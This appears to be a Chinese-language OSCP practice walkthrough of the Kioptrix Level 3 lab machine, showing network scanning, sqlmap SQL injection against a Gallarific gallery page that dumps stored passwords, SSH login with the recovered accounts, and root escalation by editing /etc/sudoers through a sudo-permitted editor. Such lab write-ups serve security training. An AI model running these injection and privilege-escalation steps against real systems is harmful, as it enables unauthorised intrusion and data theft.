OSCP备战-kioptrixvm3详细解法

探测IP

复制代码
arp-scan -l

得出目标IP:192.168.155.165

也可以使用

复制代码
netdiscover -i eth0 -r 192.168.155.0/24

也可以使用

复制代码
nmap -sN 192.168.155.0/24 --min-rate 1000

修改hosts文件

找到IP后,通过之前读取README.txt了解到,我们需要编辑hosts文件,将其指向kioptrix3.com

输入命令:

复制代码
sudo nano /etc/hosts

添加一行如图所示:

复制代码
192.168.155.165 kioptrix3.com

按下ctrl+x保存退出

端口扫描

复制代码
nmap -sV -sT --min-rate 1000 -p1-65535 IP

结果:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:49 EDT

Nmap scan report for 192.168.155.165

Host is up (0.0050s latency).

Not shown: 65533 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with

80端口

访问一下

拿dirsearch 扫一下看看

复制代码
dirsearch -u http://192.168.155.165 -e *

访问一下试试:

192.168.155.165/phpmyadmin/index.php

尝试无密码登录:admin

进入后台

no privileges提示我们没有权限,显示即为一个虚拟数据库

尝试爆破了一下,没出结果

回到主页,能点的都点一下

博客给了一个网页http://kioptrix3.com/gallery,和主页点击now跳转网页是一样的

点击login又是一个登录框

最开始我们就改了hosts文件,访问一下http://kioptrix3.com站点

如图:

明显跟之前的页面不一样,在那dirsearch扫一下

复制代码
dirsearch -u http://kioptrix3.com/gallery -e *

访问得到:

Gallarific 2.1 - Free Version released October 10, 2009

搜一下searchsploit Gallarific

有一个注入漏洞的

复制代码
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch

数据库:

复制代码
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --dbs

现在连接的数据库:

复制代码
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-db

DBMS用户:

复制代码
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-user

发现是root用户

表:

复制代码
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery --tables

字段:

复制代码
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users --columns

值:

复制代码
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users -C "username,password" --dump

得到登录结果:
admin/n0t7t1k4

如此尝试,发现在dev_accounts中,得到了两组用户名和密码

尝试进行连接,只有后两组密码可以连接

复制代码
ssh -oHostKeyAlgorithms=+ssh-rs- loneferret@192.168.155.165 

查看查看:

复制代码
cat /etc/passwd

列出当前用户家目录下的所有文件和文件夹:

复制代码
ls -al

读取文件:

复制代码
cat CompanyPolicy.README

查看权限:

复制代码
sudo -l

根据提示执行:

复制代码
sudo /usr/local/bin/ht

报错

执行命令:

复制代码
echo $TERM
export TERM=xterm
echo $TERM

重新执行

复制代码
sudo /usr/local/bin/ht


按住F3,输入/etc/sudoers

回车.当用户执行sudo命令时,系统会到/etc/sudoers文件中寻找相关信息来判断该用户是否具有执行sudo的权限,所以我们修改sudoers文件,试用户loneferret具有使用sudo执行/bin/bash的权限,以达到提权的目的。

修改配置添加一行

复制代码
loneferret ALL=(ALL) ALL

F2保存,ctral+c退出

执行命令

复制代码
sudo /bin/bash

成功

相关推荐
_Rookie._2 小时前
http触发预检请求条件
网络·网络协议·http
NewCarRen3 小时前
汽车电子控制系统开发的整体安全理念
网络·安全·汽车
桑晒.4 小时前
CSRF漏洞原理及利用
前端·web安全·网络安全·csrf
fatiaozhang95275 小时前
中兴云电脑W101D2-晶晨S905L3A-2G+8G-安卓9-线刷固件包
android·网络·电脑·电视盒子·刷机固件·机顶盒刷机
G_H_S_3_5 小时前
【网络运维】 Linux:使用 Cockpit 管理服务器
运维·服务器·网络
qq_40999093?5 小时前
安全和AI方向的学习路线
人工智能·安全
q3181369066 小时前
打造高效、安全的期货资管交易平台:开发流程与关键要素解析
安全
AORO20259 小时前
国内好用的智能三防手机,适合户外、工业、公共安全等场景
网络·5g·智能手机·制造·信息与通信
CP-DD10 小时前
OpenWrt Network configuration
服务器·网络·windows
changhao_8810 小时前
解析非法获取计算机信息系统数据罪中的其他技术手段
网络·商业秘密·非法获取计算机信息